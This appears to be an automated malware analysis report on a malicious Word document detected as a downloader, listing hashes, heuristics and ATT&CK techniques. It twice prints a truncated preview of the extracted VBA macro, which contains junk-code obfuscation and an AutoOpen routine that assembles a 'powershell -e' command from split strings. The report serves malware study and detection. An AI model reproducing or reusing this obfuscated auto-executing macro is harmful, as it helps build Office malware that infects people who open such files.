Office (OLE) malware analysis — malicious · b4c7a89c1e188964

MALICIOUS

Office (OLE)

204.0 KB Created: 2019-03-13 13:15:00 Authoring application: Microsoft Office Word First seen: 2021-09-27

MD5: c6aa98b857694746cbeb4a6482a8104e SHA-1: 24d2326ce7e0760cf26bd1e1f0c7ab7d9650cc81 SHA-256: b4c7a89c1e188964e091ad9889aced80e1aff662c4a6f0baaf6aee9639e9c132

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SPLIT_KEYWORD_OBFUSCATION' indicates that dangerous API names like 'Win32_Process' are reassembled from split string literals, a common obfuscation technique. The 'AutoOpen' macro and 'GetObject' call suggest that the macro is designed to execute automatically upon opening the document, likely to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.

Heuristics 7

ClamAV: Doc.Downloader.00536d-6895734-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.00536d-6895734-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 43966 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	43966 bytes
SHA-256: `ce238ff237be5acbd3bffe453cc78129356f902cb2ed24436c2d11e705da7dba`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "FXAB4CXw" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function hUAAwB() If rBAADAA = UAAoDGAB Then vcAGXQw = Chr(wAAADB) oABXB_ = mAABADG + ChrW(zGUo__) * 840847694 * CBool(13688527) + 474000250 / Round(SADAU_kD) - RZ4AAD + Sqr(969985382) - 864222629 * CByte(361781859) tokXBAA = Chr(IDXDcD) End If If mZAxD4A = m41AAQG Then QkoAQXA = Chr(HAUBAXUG) HAADABA = t_D1GkQ + ChrW(QcQD1AQk) * 71652099 * CBool(886405306) + 257062441 / Round(wcXUAZA) - PAAAUAxA + Sqr(744307070) - 803808797 * CByte(779699605) iCQAD1G = Chr(BAD_kDA) End If If AAAXAwc = QBQD11A Then OCGAQAX = Chr(TXAAAA) pAA4k4A = dAAAUCC + ChrW(pABDUxk) * 26115350 * CBool(594482923) + 170981871 / Round(v4DCZUDA) - bAkAQZA + Sqr(984005377) - 258158391 * CByte(937426555) TwZAAo = Chr(AcQQGA) End If If lAA1ZB = V1x_4oxG Then fUA_cUw = Chr(tABADk) hAkCDQB = woAxAA + ChrW(wDAAA_A) * 869050044 * CBool(804211230) + 94536589 / Round(wGDAUDA) - MAABCUD + Sqr(192750319) - 34608862 * CByte(435658901) tDQAX1_ = Chr(cUG1D1) End If If fAAA_oU = LUAkAw Then wAABDDZ = Chr(FAQBAxBA) kDAckw_ = zxAQwDB + ChrW(ZZCGxAQk) * 268422185 * CBool(438852457) + 389059966 / Round(jCGBQoC) - jAoAUB_ + Sqr(320492789) - 758102058 * CByte(249117522) w14xA1w = Chr(BACUAAkU) End If If UDG1XDAZ = LAUAAUAG Then lAGADAZ = Chr(QQACZoA) OwAQA1 = CADADAB + ChrW(DABCAo) * 168539386 * CBool(97910033) + 712115013 / Round(QA1_A4) - EwADAA + Sqr(207592537) - 174361722 * CByte(73248147) jDAZAD = Chr(SDAABD) End If If vkDZxGA = PBAQAQBG Then KwcADUw = Chr(EGDAAc) EcD_XA1Q = MABwGDG + ChrW(zDAkQDB) * 744836428 * CBool(245276904) + 192014635 / Round(oABZUBAc) - cBACAQoc + Sqr(733965625) - 762902059 * CByte(303222300) sDoBUDA = Chr(Go_AUA) End If If TBAAGUAG = McXCQX4 Then QkAocQA4 = Chr(vADGQAw) GUQAAQA = coo_UXZ + ChrW(wXoCAw) * 187664420 * CBool(210890131) + 748791201 / Round(hU1AXo) - qQDBDDA + Sqr(50165881) - 615361918 * CByte(434617790) HQCAUB = Chr(bAAQADx) End If End Function Sub autoopen() On Error Resume Next If r4wDXCC = zAUUCcAA Then jAABAZ = Chr(vAxGUAGC) hAD1w1c = rcDDDZAC + ChrW(nQo_AxUQ) * 331273200 * CBool(27273003) + 452637665 / Round(zBDABU) - tCZAABAC + Sqr(150328992) - 350283579 * CByte(333514268) MAQ_AA = Chr(h_QDcDw) End If If KCDA4Z = occAAADU Then fUAAAkGC = Chr(lDcZAA) KZABAAA1 = OUA_B4 + ChrW(HxkCDAAx) * 233039044 * CBool(669821698) + 981870913 / Round(fADXUDx) - WQAQGAUA + Sqr(539781038) - 389743467 * CByte(852176396) U4AAXC = Chr(D1BGGQBA) End If If VAAGDUQX = tAQAoAU Then bAAABQGQ = Chr(UG1U_DA_) BAcAcAA = wZAAQA + ChrW(wAoGoQA) * 48060244 * CBool(839004474) + 581674388 / Round(zAXUZo) - VAACAAA + Sqr(254128243) - 481508475 * CByte(598742438) HxG1ACAD = Chr(IABXAGA) End If SU4DGABo (McCkACwA + "po" + dwAZAC + "wersh" + vBAAABGZ + "ell -e " + TA1AAQ + uBUUADx + XokDBA + PAAACQ + CAxBkBB + zQACAUZ) If zXkQDAZU = mCBcACA Then Y_UoAkD1 = Chr(icAACwA) O1AxQQB = aABkUA + ChrW(O1wGcA) * 295804366 * CBool(271502775) + 144036889 / Round(ooQwAADB) - zDABDQQ + Sqr(848151534) - 527374704 * CByte(597147512) hCADA1G = Chr(jcBQkAwC) End If If q1wxQk1A = aAUAGZwo Then ikBA1UU_ = Chr(VZABCA) iDA_C_A = QGDA1AZ + ChrW(XoUAAAAU) * 549579165 * CBool(997995911) + 480272976 / Round(LcAX1DXA) - KADAAZk + Sqr(476233654) - 922639560 * CByte(268984209) hAZAAAAA = Chr(nQAUxDQ) End If If nDQAk_wk = l1U41Akk Then ICGAco = Chr(JZAADxBX) HxQAAQ1A = wAAkAAQ + ChrW(pDwAACA) * 624836757 * CBool(406814430) + 213276037 / Round(FAUcQZ) - G_AZAAB + Sqr(69436041) - 21137613 * CByte(425364) oA4DABA = Chr(voUUAocA) End If End Sub Function EDZDAcD() If CAXGcxx = m44QUXAA Then nAUAA_ = Chr(IZAAUxAc) oGAXxcGQ = GAAxAAA + ChrW(YBX4XBA) * 900071554 * CBool(598844070) + 198325339 / Round(UGAx_A) - VZBcUGQ + Sqr(756088232) - 897006791 * CByte(982120095) PDAXBA = Chr(ODA4oQ) End If If RGx ... (truncated)

SHA-256: ce238ff237be5acbd3bffe453cc78129356f902cb2ed24436c2d11e705da7dba

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "FXAB4CXw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function hUAAwB()
   If rBAADAA = UAAoDGAB Then
vcAGXQw = Chr(wAAADB)
oABXB_ = mAABADG + ChrW(zGUo__) * 840847694 * CBool(13688527) + 474000250 / Round(SADAU_kD) - RZ4AAD + Sqr(969985382) - 864222629 * CByte(361781859)
tokXBAA = Chr(IDXDcD)
End If
   If mZAxD4A = m41AAQG Then
QkoAQXA = Chr(HAUBAXUG)
HAADABA = t_D1GkQ + ChrW(QcQD1AQk) * 71652099 * CBool(886405306) + 257062441 / Round(wcXUAZA) - PAAAUAxA + Sqr(744307070) - 803808797 * CByte(779699605)
iCQAD1G = Chr(BAD_kDA)
End If
   If AAAXAwc = QBQD11A Then
OCGAQAX = Chr(TXAAAA)
pAA4k4A = dAAAUCC + ChrW(pABDUxk) * 26115350 * CBool(594482923) + 170981871 / Round(v4DCZUDA) - bAkAQZA + Sqr(984005377) - 258158391 * CByte(937426555)
TwZAAo = Chr(AcQQGA)
End If
   If lAA1ZB = V1x_4oxG Then
fUA_cUw = Chr(tABADk)
hAkCDQB = woAxAA + ChrW(wDAAA_A) * 869050044 * CBool(804211230) + 94536589 / Round(wGDAUDA) - MAABCUD + Sqr(192750319) - 34608862 * CByte(435658901)
tDQAX1_ = Chr(cUG1D1)
End If
   If fAAA_oU = LUAkAw Then
wAABDDZ = Chr(FAQBAxBA)
kDAckw_ = zxAQwDB + ChrW(ZZCGxAQk) * 268422185 * CBool(438852457) + 389059966 / Round(jCGBQoC) - jAoAUB_ + Sqr(320492789) - 758102058 * CByte(249117522)
w14xA1w = Chr(BACUAAkU)
End If
   If UDG1XDAZ = LAUAAUAG Then
lAGADAZ = Chr(QQACZoA)
OwAQA1 = CADADAB + ChrW(DABCAo) * 168539386 * CBool(97910033) + 712115013 / Round(QA1_A4) - EwADAA + Sqr(207592537) - 174361722 * CByte(73248147)
jDAZAD = Chr(SDAABD)
End If
   If vkDZxGA = PBAQAQBG Then
KwcADUw = Chr(EGDAAc)
EcD_XA1Q = MABwGDG + ChrW(zDAkQDB) * 744836428 * CBool(245276904) + 192014635 / Round(oABZUBAc) - cBACAQoc + Sqr(733965625) - 762902059 * CByte(303222300)
sDoBUDA = Chr(Go_AUA)
End If
   If TBAAGUAG = McXCQX4 Then
QkAocQA4 = Chr(vADGQAw)
GUQAAQA = coo_UXZ + ChrW(wXoCAw) * 187664420 * CBool(210890131) + 748791201 / Round(hU1AXo) - qQDBDDA + Sqr(50165881) - 615361918 * CByte(434617790)
HQCAUB = Chr(bAAQADx)
End If
End Function
Sub autoopen()
On Error Resume Next
   If r4wDXCC = zAUUCcAA Then
jAABAZ = Chr(vAxGUAGC)
hAD1w1c = rcDDDZAC + ChrW(nQo_AxUQ) * 331273200 * CBool(27273003) + 452637665 / Round(zBDABU) - tCZAABAC + Sqr(150328992) - 350283579 * CByte(333514268)
MAQ_AA = Chr(h_QDcDw)
End If
   If KCDA4Z = occAAADU Then
fUAAAkGC = Chr(lDcZAA)
KZABAAA1 = OUA_B4 + ChrW(HxkCDAAx) * 233039044 * CBool(669821698) + 981870913 / Round(fADXUDx) - WQAQGAUA + Sqr(539781038) - 389743467 * CByte(852176396)
U4AAXC = Chr(D1BGGQBA)
End If
   If VAAGDUQX = tAQAoAU Then
bAAABQGQ = Chr(UG1U_DA_)
BAcAcAA = wZAAQA + ChrW(wAoGoQA) * 48060244 * CBool(839004474) + 581674388 / Round(zAXUZo) - VAACAAA + Sqr(254128243) - 481508475 * CByte(598742438)
HxG1ACAD = Chr(IABXAGA)
End If
SU4DGABo (McCkACwA + "po" + dwAZAC + "wersh" + vBAAABGZ + "ell -e " + TA1AAQ + uBUUADx + XokDBA + PAAACQ + CAxBkBB + zQACAUZ)
   If zXkQDAZU = mCBcACA Then
Y_UoAkD1 = Chr(icAACwA)
O1AxQQB = aABkUA + ChrW(O1wGcA) * 295804366 * CBool(271502775) + 144036889 / Round(ooQwAADB) - zDABDQQ + Sqr(848151534) - 527374704 * CByte(597147512)
hCADA1G = Chr(jcBQkAwC)
End If
   If q1wxQk1A = aAUAGZwo Then
ikBA1UU_ = Chr(VZABCA)
iDA_C_A = QGDA1AZ + ChrW(XoUAAAAU) * 549579165 * CBool(997995911) + 480272976 / Round(LcAX1DXA) - KADAAZk + Sqr(476233654) - 922639560 * CByte(268984209)
hAZAAAAA = Chr(nQAUxDQ)
End If
   If nDQAk_wk = l1U41Akk Then
ICGAco = Chr(JZAADxBX)
HxQAAQ1A = wAAkAAQ + ChrW(pDwAACA) * 624836757 * CBool(406814430) + 213276037 / Round(FAUcQZ) - G_AZAAB + Sqr(69436041) - 21137613 * CByte(425364)
oA4DABA = Chr(voUUAocA)
End If
End Sub
Function EDZDAcD()
   If CAXGcxx = m44QUXAA Then
nAUAA_ = Chr(IZAAUxAc)
oGAXxcGQ = GAAxAAA + ChrW(YBX4XBA) * 900071554 * CBool(598844070) + 198325339 / Round(UGAx_A) - VZBcUGQ + Sqr(756088232) - 897006791 * CByte(982120095)
PDAXBA = Chr(ODA4oQ)
End If
   If RGx
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.